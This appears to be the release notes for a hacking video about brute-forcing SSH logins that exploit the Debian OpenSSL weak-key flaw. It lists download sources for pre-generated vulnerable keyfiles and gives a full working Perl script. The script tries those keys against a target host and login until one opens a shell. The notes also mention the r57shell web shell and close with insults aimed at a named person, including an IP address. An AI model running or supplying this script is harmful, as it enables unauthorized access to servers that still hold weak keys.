---------------------------------------------------------
--- Debian OpenSSL Bruteforce
--- author: F0rtress Zer0 (mail - last frame)
---------------------------------------------------------
music: Trent Reznor - Damnation (from quake)

Pre-generated keyfiles:
http://sugar.metasploit.com/debian_ssh_dsa_1024_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 <- THIS USED
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2  <- MIRROR
http://sugar.metasploit.com/debian_ssh_rsa_1023_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_1024_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_2047_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_4096_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_8192_1_4100_x86.tar.bz2

Brutforcer script code:
--- BEGIN ---
#!/usr/bin/perl
use strict;
use warnings;

## SSH keyfile bruteforce script
## Coded by Fortress Zero (nomina.sunt.odiosa@gmail.com)

my $keysPerConnect = 6;

my $usage = "\nUsage: ./script.pl <pathToKeys> <host> <login>\n";

my $path = shift or die($usage."Path to keys is not specified\n");
my $host = shift or die($usage."Host is not specified\n");
my $login = shift or die($usage."Login is not specified\n");

die or chdir($path);
opendir(A, $path) or die("\nerr: could not open dir\n");
print "\nCounting all keys...\n";
my @kez;
while ($_ = readdir(A)) {
 chomp;
 # filter only private keys
 next unless m,^\w+-\d+$,;
 push(@kez, $_);
}
my $full = $#kez+1;
print "TOTAL ".$full." number of keys\n";
print "BRUTEFORCE attack start\n";
my $cmdsCount = int($full/$keysPerConnect);
my $pre_cmd = "ssh -o \"BatchMode yes\" -l ".$login;
my $post_cmd = ' '.$host.' "id;exit"';
my $clock_start = time();
my $time_elapsed = 0;
my $time_left = 0;
for(my $i = 1; $i <= $cmdsCount; $i++){
 $time_elapsed = time()-$clock_start;
 $time_left = int($time_elapsed/$i*($cmdsCount-$i));
 printf "%06d/%06d - %02d:%02d:%02d/%02d:%02d:%02d\n",
        $i,
        $cmdsCount,
        (gmtime($time_elapsed))[2],
        (gmtime($time_elapsed))[1],
        (gmtime($time_elapsed))[0],
        (gmtime($time_left))[2],
        (gmtime($time_left))[1],
        (gmtime($time_left))[0];
 my $mid_cmd = '';
 for(my $j = 0; $j < $keysPerConnect; $j++){
  my $cur = shift(@kez);
  $mid_cmd.= " -i ".$cur;
 }
 my $ret = system($pre_cmd.$mid_cmd.$post_cmd);
 if($ret!=65280){
  ## seems that we've got shell
  my @valid = split ' -i ',$mid_cmd;
  shift @valid;
  print "Valid pack of keys found\n";
  print "Trying to determine correct key...\n";
  foreach (@valid) {
   print $_."\n";
   my $ret2 = system($pre_cmd.' -i '.$_.$post_cmd);
   if($ret2!=65280){
    print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n";
    die("SUCCESS!!!!\n");
   }
  }
  print "Looks like false alarm...\n";
 }
}
print "Small amount of keys remaining,\nTrying one-by-one\n";
foreach (@kez) {
 print $_."\n";
 my $ret3 = system($pre_cmd.' -i '.$_.$post_cmd);
 if($ret3!=65280){
  print "You fucking lucky!\n";
  print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n";
  die("SUCCESS!!!!\n");
 }
}
print "SHIT! BRUTEFORCE FAILED!\n";
exit;
--- END ---

Software seen in video:
 - Windows XP SP2
 - OperaUSB 9.51
 - r57shell 1.4
 - portaputty
 - Ubuntu 7.10

Software used for creation:
 - MS Virtual PC 2007
 - VMWare Player
 - Ubuntu 7.10 (2 times)
 - BB Flashback recorder 1.5.6
 - Macromedia Flash MX 2004
 - Nero WaveEditor 3.9.1.0
 - Audacity 1.2.6
 - DivX Codec
 - LAME MP3 encoder/decoder

---
Hack the planet!
Keep private!
Cheat script-kiddies!
---
Hello gobzer!
Hello Molot!
Hello AFX!
Hello flufx!
Hello kostapc!
hello unknown from cc06 (nokia, your DVD) - contact me!
---
Fuck you Trash !!!(245659,982399,tgbr,92.245.59.233)
Antichat abused my video! I HATE YOU!
---
I know kung-foo
You can now hire me for something legal - contact thru email